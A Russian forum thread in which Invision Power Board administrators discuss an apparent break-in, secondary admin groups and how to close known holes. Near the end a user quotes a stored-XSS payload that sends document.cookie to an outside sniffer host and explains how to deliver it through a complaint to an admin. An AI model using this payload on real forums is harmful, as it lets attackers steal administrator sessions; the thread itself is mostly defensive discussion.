Уязвимости форумов Invision Power Board

[sapron]

Как избавиться от sql-инъекции?

[xRay]

.silent

Нет этого не было

Еще ни кто с подобной ситуацией не сталкивался?

[Ринальдус]

У меня вот что произошло. Каким-то образом пользователь забанил другого пользователя. Через предупреждения, т.е как модератор. Я решил, что он использовал какую-то уязвимость в 2.1.4 и срочно обновил форум до 2.1.5. После чего я 2-му админу (я не единственный админ на форуме) написал несколько слов в админке в блокнот. А этот хакер там ответил!!! Смотрю наши админские логи - ничего, все чисто. В смысле, отображено то, что мы со 2-м админом сами делали. Вот и возникает вопрос: WTF? Каким образом он смог проникнуть в админку, если в 2.1.5 нет еще обнаруженных уязвимостей? Пароль я поменял. Его следов в админке не вижу. Но покоя мне нет. Объясните, какими путями можно взломать форум, чтоб войти в админку? Я никогда этим не интересовался, потому что у меня мозги не набекрень, как у хакеров. Хакеры, я считаю, - больные люди. А теперь придется все это изучать, чтобы от них защититься...

[Milse]

Ринальдус! Участие во второй группе. Выполни запрос и глянь кто.

 

SELECT id, name, mgroup, mgroup_others, org_perm_id

FROM ibf_members WHERE mgroup_others>0 OR org_perm_id >0

[nafigator]

Ринальдус, пароль нужно сменить у всех админов.

А теперь, похоже, и у всех юзеров.

[Ринальдус]

Участие во второй группе.

Как понять эту фразу?

Выполни запрос и глянь кто.

Да я знаю, кто это. Мне непонятны лишь 2 вещи:

1. Как он смог взломать форум.

2. Может ли он сейчас войти в админку и что мне надо сделать, чтобы перекрыть ему доступ.

У него я это спросить не могу, т.к не хочу, чтобы он знал, что я все знаю. Иначе затаится и все.

SELECT id, name, mgroup, mgroup_others, org_perm_id

FROM ibf_members WHERE mgroup_others>0 OR org_perm_id >0

Где выполнить запрос: в SQL-разделе админки или в phpMyAdmin? И что это даст?

Ринальдус, пароль нужно сменить у всех админов.

Себе пароль я сменил. И 2-му админу скажу тоже сменить.

А теперь, похоже, и у всех юзеров.

Сменить пароль более чем у 100 юзеров? И как я им объясню мотивы? Я же не хочу, чтобы они знали про все это. И мне тоже непонятно, зачем менять пароли ВСЕМ юзерам. Можно разве что этому хакеру сменить пароль к его аккаунту, только все равно не понимаю, что это даст.

[dfc_darkman]

Ринальдус

ты не понял.

Возьми отредактируй какого-либо юзверя. Там есть вкладка - "ВТОРОСТЕПЕННАЯ ГРУППА" или типа того.

Тоесть.

Вот у меня, например, есть человек на форуме - он в группе ВИП Но второстепенная группа у него "АДМИН" - соответсвенно он на форуме с админскими правами и имеет доступ в АЦ. Тоже самое может быть и у тебя - какой-то юзверь каким-то макаром присобачил себе второстепенную группу. У него пишетца member, а в натуре - он админ.

Вышеуказанный запрос позволяет определить таких юзверей. Его можно выполнить как в АЦ таки в пхпмайадмин

Вперёд

[Song]

А нифига не получится ИМХО.

Вход идёт по правам основной группы

[xRay]

Song

На счет второстепенной группы все пашет как сказал dfc_darkman

[Ринальдус]

Гм... смотрю я профиль этого хакера. Основная группа: "Пользователь". Второстепенная группа: "Пользователь". Все правильно, так и надо. А если он залез в админку хз каким образом, сменил себе второстепенную группу, забанил юзера, потом поменял группу на прежнюю - об этом где-нибудь в логах записано? Ведь он может так всегда и делать, когда захочет вновь получить доступ...

P.S. Запустил запрос, он мне выдал пустую таблицу без каких-либо записей. Так и должно быть?

[Lenar]

А как в версии 2.1.5 защититься от этого хака http://forum.antichat.ru/threadnav17358-3-10.html

[dfc_darkman]

А нифига не получится ИМХО.

Вход идёт по правам основной группы

Ну у меня работает

Имхо, походу дела, как написано на самом форуме в админке или типа того - права двух групп суммируются - вот и всё.

[Song]

Имхо, походу дела, как написано на самом форуме в админке или типа того - права двух групп суммируются - вот и всё.

Song

На счет второстепенной группы все пашет как сказал dfc_darkman

Чего вы мне парите?

Вот я смотрю admin.php и вижу:

					// Do we have admin access?
				//----------------------------------

				$DB->query("SELECT * FROM ibf_groups WHERE g_id='".$MEMBER['mgroup']."'");

				$GROUP = $DB->fetch_row();

				if ($GROUP['g_access_cp'] != 1)
				{
					do_login("You do not have access to the administrative CP");
				}
				else
				{
					$session_validated = 1;
					$this_session	  = $row;
				}

Обратите внимание на строчку "if ($GROUP['g_access_cp'] != 1)" !

 

Допустим есть пользователь "Вася". У него группа "Гости". Ему дали второстепенную группу "Админы".

Этот запрос вернёт g_access_cp = 0! т.к. у группы гости нет входа в админку, не смотря на то что "второстепенная группа" которая правильней называется "дополнительная маска" поставлена админская маска.

Дополнительная маска играет роль только на доступ в разделы!

 

Ну ещё возможен вариант: я не понял про что вы говорите

[Dr.Freddy]

Если у пользователя проставлена вторичная группа — администраторы, он имеет право входа в админ-панель, но не считается ROOT админом и не имеет права доступа к некоторым секциям, например SQL Toolbox.

[Song]

Ок, Попробовал.

Вот что получил:

You do not have access to the administrative CP

 

Хотя, я вот что думаю.

А может эта шняга появилась с 1.3 ?

[Dr.Freddy]

А ты проставил администраторскую группу или маску доступа? Если группу, то доступ есть 100% — я так часто на поддерживаемых форумах сижу, и меня не видно, и доступ к админке есть.

 

Вполне возможно, что появилась именно с 1.3.1, я версии старше не админил и даже не ставил.

[Song]

Ок, тогда расскажи где в админке 1.3 назначается

1) администраторская группа

2) второстепенная группа

 

1. Это наверно в комбо-боксе групп в режиме редактирования пользователя

2. ?

[Dr.Freddy]

Админская группа задаётся в conf_global.php переменной admin_group. Основная группа пользователя проставляется в интерфейсе редактирования пользователя, а вот второстепенная, я смотрю, появилась только в 2.0.x — в моей инсталляции 1.3.1 такой опции нет. В установленной 2.0.4 — есть, задаётся в том же интерфейсе редактирования пользователя.

[Song]

ну так ё-моё я ж про 1.х

при чём тут вообще 2.х ?

 

хотя в принципе почему я должен был так думать.. никто про версию не говорил.

Ну короче в 1.х нет никаких второстепеннных групп, там есть такой термин "дополнительная маска", которая в оригинале сделана очень тупо и убого, пришлось всё переделывать. Чтобы она действительно дополняла, а не замещала. Очень помогает дать добавочные права на разделы. Именно на разделы, админка здесь вообще не причём! На доступ в админку не влияет.

[sad888]

Вопрос как закрыть уязвимости про которые написано на:

http://forum.antichat.ru/threadnav17358-1-10.html

http://forum.antichat.ru/threadnav17281-1-10.html

[freeman85]

чет на античате столько гозных тем, что все и вся работает...успокойте.. скажите что это не работает

[AHTIKILLER]

могут украсть кукисы администрации

Кто не в курсе - в апрельском Х@кере писали про возможность увода админских кукисов посредством сниффера с помощью отправки жалобы, содержащей код (версия 2.1.3):

<php><СКРИПТ>img = new Image(); img. src = "http://xxxxx/s/s.gif?"+document.cookie;</СКРИПТ></php>

Подскажите, как это закрыть, т.к. в ipb 2.0.4 также отлично работает. (Наверное, уже исправлено в 2.1.4 и 2.1.5).

[dfc_darkman]

Еще раз, только точно - какой код для 2.0.4. нужно пописать и где?

[ВасилОК]

AHTIKILLER

Было уже. Читайте топик.

[AHTIKILLER]

Ладно, чуть позже почитаю, пока что-то не нашел.

 

dfc_darkman Отправить жалобу админу на сообщение (скажем, содержащее флуд). Туда и вписать код с адресом сниффера (допустим, этого _http://kanick.ру/sniffer).